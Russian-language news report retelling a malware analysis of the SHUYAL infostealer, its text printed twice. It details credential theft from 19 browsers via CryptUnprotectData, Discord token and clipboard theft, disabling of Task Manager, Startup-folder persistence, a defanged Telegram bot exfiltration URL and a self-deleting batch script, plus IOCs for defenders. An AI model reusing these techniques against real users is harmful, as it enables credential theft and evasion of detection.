Стилер-торнадо SHUYAL — приходит, сгребает всё до последнего пикселя и испаряется в Telegram
NewsMakerВредонос нового уровня наглости.
Исследователи из Hybrid Analysis задокументировали ранее неизвестный инфостилер , отличающийся нестандартным сочетанием глубокой разведки системы, обширного сбора учётных данных и агрессивных методов уклонения от обнаружения. Экземпляр был обнаружен под именем SHUYAL — по уникальному пути отладочной информации (PDB path), в котором также фигурирует имя пользователя «sheepy». Это программное обеспечение ориентировано на массовую кражу браузерных паролей, токенов Discord, данных буфера обмена и скриншотов, с последующей отправкой через Telegram-бота . Все артефакты после завершения работы удаляются, включая саму вредоносную программу.
Сбор информации начинается сразу после запуска. SHUYAL создаёт анонимный канал связи в системе с помощью вызова API CreatePipe, который позже используется для чтения вывода от дочерних процессов. В числе первых команд — серия вызовов wmic, с помощью которых программа получает модель и серийный номер жёстких дисков (wmic diskdrive get model,serialnumber), описание и ID клавиатуры (wmic path Win32_Keyboard get Description,DeviceID), данные о мыши (wmic path Win32_PointingDevice get Description,PNPDeviceID, вызывается дважды) и информацию о подключённом мониторе (wmic path Win32_DesktopMonitor get Description,PNPDeviceID). Последняя команда wmic get name завершается с ошибкой, так как синтаксис неполный.
SHUYAL также извлекает путь до фонового изображения рабочего стола пользователя, запуская PowerShell со следующей командой:
(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper
Параллельно вредонос отслеживает процессы в системе и, если обнаруживает запущенный диспетчер задач (Taskmgr.exe), немедленно завершает его с помощью API TerminateProcess. Затем редактируется системный реестр: в ключ HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System добавляется параметр DisableTaskMgr со значением 1, тем самым запрещая повторный запуск диспетчера. Это изменение производится через PowerShell, как показано в отчёте.
SHUYAL получает дескриптор стандартного выходного устройства и активирует режим ENABLE_ECHO_INPUT, меняя конфигурацию консоли. Это делается явно через Windows API, что может быть использовано как один из индикаторов вредоносного поведения.
Для закрепления в системе SHUYAL использует API SHGetSpecialFolderPathA с параметром 0x7 (CSIDL_STARTUP), чтобы определить расположение папки автозагрузки пользователя. Затем копирует себя в эту директорию с помощью функции CopyFileA. В коде присутствуют строки, подтверждающие как успешное, так и неудачное выполнение этой операции.
После разведки и установления постоянства начинается сбор чувствительных данных. Программа фокусируется на краже учётных записей из браузеров . Всего целевых приложений — 19, включая:
SELECT origin_url, username_value, password_value FROM logins
Данные дешифруются через встроенные в Windows механизмы. Сначала из файла Local State извлекается мастер-ключ, закодированный в Base64. Он декодируется и расшифровывается с использованием API CryptUnprotectData. Полученный мастер-ключ применяется для расшифровки паролей из базы. Все данные сохраняются в saved_passwords.txt внутри временной директории runtime\passwords.
История браузера копируется из файла \User Data\Default\History и сохраняется как runtime\history\history.txt. Буфер обмена анализируется через OpenClipboard и GetClipboardData, его содержимое сбрасывается в runtime\clipboard\clipboard.txt. Снимок экрана делается с помощью GdiplusStartup, BitBlt и GdipSaveImageToFile, результат сохраняется под именем runtime\pic\ss.png.
Также SHUYAL охотится за токенами Discord, включая обычный клиент, Discord Canary и PTB-версию. Найденные токены записываются в runtime\browser\tokens.txt. Кроме того, создаётся runtime\browser\debug_log.txt, в котором логируются действия по работе с браузерами, найденные базы, успешность дешифровки и прочая отладочная информация.
Чтобы сохранить следы своих действий, вредонос удаляет данные, ранее выгруженные в runtime-директорию, а также следы изменений в базах самих браузеров. Перед этим всё содержимое временной папки runtime архивируется с помощью PowerShell:
Compress-Archive -Path 'C:\Users\\AppData\Local\Temp\runtime\*' -DestinationPath 'C:\Users\\AppData\Local\Temp\runtime.zip' -Force
Архив runtime.zip отправляется на Telegram-бота по адресу:
hxxps[:]//api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864
Для сетевой коммуникации в процессе также используется WSAEnumNetworkEvents — функция, позволяющая определять активность сокетов. Это может быть частью логики ожидания соединения или проверки сетевой доступности перед передачей данных.
После завершения всех операций SHUYAL инициирует самоуничтожение. Создаётся BAT-скрипт util.bat, содержащий команды удаления:
@Echo off
timeout /t 3 /nobreak > NUL
del "SHUYAL.exe"
rd /s /q "%TEMP%\runtime"
exit
Он сохраняется на диск и запускается как финальный этап работы. Таким образом, программа не оставляет почти никаких следов на файловой системе жертвы.
Все поведенческие индикаторы зафиксированы в отчёте Hybrid Analysis. Исследователи подчёркивают, что SHUYAL демонстрирует уверенный переход от простых кроссплатформенных стилеров к модульным автономным решениям, способным действовать быстро, агрессивно и незаметно. Благодаря Telegram в качестве канала передачи, злоумышленник получает немедленный доступ к данным, а механизмы зачистки позволяют избежать последующего анализа уже после завершения атаки.
IOC и технические артефакты:
SHA256:
810d4850ee216df639648a37004a0d4d1275a194924fa53312d3403be97edf5c
Созданные файлы:
C:\Users\\AppData\Local\Temp\runtime\browser\debug_log.txt
C:\Users\\AppData\Local\Temp\runtime\browser\tokens.txt
C:\Users\\AppData\Local\Temp\runtime\clipboard\clipboard.txt
C:\Users\\AppData\Local\Temp\runtime\history\history.txt
C:\Users\\AppData\Local\Temp\runtime\passwords\saved_passwords.txt
C:\Users\\AppData\Local\Temp\runtime\pic\ss.png
C:\Users\\AppData\Local\Temp\runtime.zip
util.bat
Вызовы процессов:
wmic diskdrive get model,serialnumber
wmic path Win32_Keyboard get Description,DeviceID
wmic path Win32_PointingDevice get Description,PNPDeviceID
wmic path Win32_DesktopMonitor get Description,PNPDeviceID
wmic get name
powershell -command "(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper"
powershell -Command "Compress-Archive …"
SHUYAL — типичный представитель современного поколения инфостилеров , в котором сочетание модульности, агрессивной очистки следов и прямой доставки через Telegram делает его особенно опасным для плохо защищённых систем. Несмотря на множество технических приёмов, его ключевая задача — кража учётных данных и быстрая их передача злоумышленнику. Подобные образцы подчёркивают необходимость комплексного подхода к защите конечных точек: простое антивирусное ПО зачастую не способно своевременно отследить такие атаки, особенно если они тщательно избегают сигнатурных срабатываний.
Исследователи из Hybrid Analysis задокументировали ранее неизвестный инфостилер , отличающийся нестандартным сочетанием глубокой разведки системы, обширного сбора учётных данных и агрессивных методов уклонения от обнаружения. Экземпляр был обнаружен под именем SHUYAL — по уникальному пути отладочной информации (PDB path), в котором также фигурирует имя пользователя «sheepy». Это программное обеспечение ориентировано на массовую кражу браузерных паролей, токенов Discord, данных буфера обмена и скриншотов, с последующей отправкой через Telegram-бота . Все артефакты после завершения работы удаляются, включая саму вредоносную программу.
Сбор информации начинается сразу после запуска. SHUYAL создаёт анонимный канал связи в системе с помощью вызова API CreatePipe, который позже используется для чтения вывода от дочерних процессов. В числе первых команд — серия вызовов wmic, с помощью которых программа получает модель и серийный номер жёстких дисков (wmic diskdrive get model,serialnumber), описание и ID клавиатуры (wmic path Win32_Keyboard get Description,DeviceID), данные о мыши (wmic path Win32_PointingDevice get Description,PNPDeviceID, вызывается дважды) и информацию о подключённом мониторе (wmic path Win32_DesktopMonitor get Description,PNPDeviceID). Последняя команда wmic get name завершается с ошибкой, так как синтаксис неполный.
SHUYAL также извлекает путь до фонового изображения рабочего стола пользователя, запуская PowerShell со следующей командой:
(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper
Параллельно вредонос отслеживает процессы в системе и, если обнаруживает запущенный диспетчер задач (Taskmgr.exe), немедленно завершает его с помощью API TerminateProcess. Затем редактируется системный реестр: в ключ HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System добавляется параметр DisableTaskMgr со значением 1, тем самым запрещая повторный запуск диспетчера. Это изменение производится через PowerShell, как показано в отчёте.
SHUYAL получает дескриптор стандартного выходного устройства и активирует режим ENABLE_ECHO_INPUT, меняя конфигурацию консоли. Это делается явно через Windows API, что может быть использовано как один из индикаторов вредоносного поведения.
Для закрепления в системе SHUYAL использует API SHGetSpecialFolderPathA с параметром 0x7 (CSIDL_STARTUP), чтобы определить расположение папки автозагрузки пользователя. Затем копирует себя в эту директорию с помощью функции CopyFileA. В коде присутствуют строки, подтверждающие как успешное, так и неудачное выполнение этой операции.
После разведки и установления постоянства начинается сбор чувствительных данных. Программа фокусируется на краже учётных записей из браузеров . Всего целевых приложений — 19, включая:
- Chrome
- Edge
- Brave
- Opera
- OperaGX
- Chromium
- Yandex
- Vivaldi
- Tor Browser
- Waterfox
- Epic
- Comodo
- Slimjet
- Coccoc
- Maxthon
- 360browser
- UR Browser
- Avast Secure Browser
- Falkon
SELECT origin_url, username_value, password_value FROM logins
Данные дешифруются через встроенные в Windows механизмы. Сначала из файла Local State извлекается мастер-ключ, закодированный в Base64. Он декодируется и расшифровывается с использованием API CryptUnprotectData. Полученный мастер-ключ применяется для расшифровки паролей из базы. Все данные сохраняются в saved_passwords.txt внутри временной директории runtime\passwords.
История браузера копируется из файла \User Data\Default\History и сохраняется как runtime\history\history.txt. Буфер обмена анализируется через OpenClipboard и GetClipboardData, его содержимое сбрасывается в runtime\clipboard\clipboard.txt. Снимок экрана делается с помощью GdiplusStartup, BitBlt и GdipSaveImageToFile, результат сохраняется под именем runtime\pic\ss.png.
Также SHUYAL охотится за токенами Discord, включая обычный клиент, Discord Canary и PTB-версию. Найденные токены записываются в runtime\browser\tokens.txt. Кроме того, создаётся runtime\browser\debug_log.txt, в котором логируются действия по работе с браузерами, найденные базы, успешность дешифровки и прочая отладочная информация.
Чтобы сохранить следы своих действий, вредонос удаляет данные, ранее выгруженные в runtime-директорию, а также следы изменений в базах самих браузеров. Перед этим всё содержимое временной папки runtime архивируется с помощью PowerShell:
Compress-Archive -Path 'C:\Users\\AppData\Local\Temp\runtime\*' -DestinationPath 'C:\Users\\AppData\Local\Temp\runtime.zip' -Force
Архив runtime.zip отправляется на Telegram-бота по адресу:
hxxps[:]//api.telegram[.]org/bot7522684505:AAEODeii83B_nlpLi0bUQTnOtVdjc8yHfjQ/sendDocument?chat_id=-1002503889864
Для сетевой коммуникации в процессе также используется WSAEnumNetworkEvents — функция, позволяющая определять активность сокетов. Это может быть частью логики ожидания соединения или проверки сетевой доступности перед передачей данных.
После завершения всех операций SHUYAL инициирует самоуничтожение. Создаётся BAT-скрипт util.bat, содержащий команды удаления:
@Echo off
timeout /t 3 /nobreak > NUL
del "SHUYAL.exe"
rd /s /q "%TEMP%\runtime"
exit
Он сохраняется на диск и запускается как финальный этап работы. Таким образом, программа не оставляет почти никаких следов на файловой системе жертвы.
Все поведенческие индикаторы зафиксированы в отчёте Hybrid Analysis. Исследователи подчёркивают, что SHUYAL демонстрирует уверенный переход от простых кроссплатформенных стилеров к модульным автономным решениям, способным действовать быстро, агрессивно и незаметно. Благодаря Telegram в качестве канала передачи, злоумышленник получает немедленный доступ к данным, а механизмы зачистки позволяют избежать последующего анализа уже после завершения атаки.
IOC и технические артефакты:
SHA256:
810d4850ee216df639648a37004a0d4d1275a194924fa53312d3403be97edf5c
Созданные файлы:
C:\Users\\AppData\Local\Temp\runtime\browser\debug_log.txt
C:\Users\\AppData\Local\Temp\runtime\browser\tokens.txt
C:\Users\\AppData\Local\Temp\runtime\clipboard\clipboard.txt
C:\Users\\AppData\Local\Temp\runtime\history\history.txt
C:\Users\\AppData\Local\Temp\runtime\passwords\saved_passwords.txt
C:\Users\\AppData\Local\Temp\runtime\pic\ss.png
C:\Users\\AppData\Local\Temp\runtime.zip
util.bat
Вызовы процессов:
wmic diskdrive get model,serialnumber
wmic path Win32_Keyboard get Description,DeviceID
wmic path Win32_PointingDevice get Description,PNPDeviceID
wmic path Win32_DesktopMonitor get Description,PNPDeviceID
wmic get name
powershell -command "(Get-ItemProperty 'HKCU:\Control Panel\Desktop').Wallpaper"
powershell -Command "Compress-Archive …"
SHUYAL — типичный представитель современного поколения инфостилеров , в котором сочетание модульности, агрессивной очистки следов и прямой доставки через Telegram делает его особенно опасным для плохо защищённых систем. Несмотря на множество технических приёмов, его ключевая задача — кража учётных данных и быстрая их передача злоумышленнику. Подобные образцы подчёркивают необходимость комплексного подхода к защите конечных точек: простое антивирусное ПО зачастую не способно своевременно отследить такие атаки, особенно если они тщательно избегают сигнатурных срабатываний.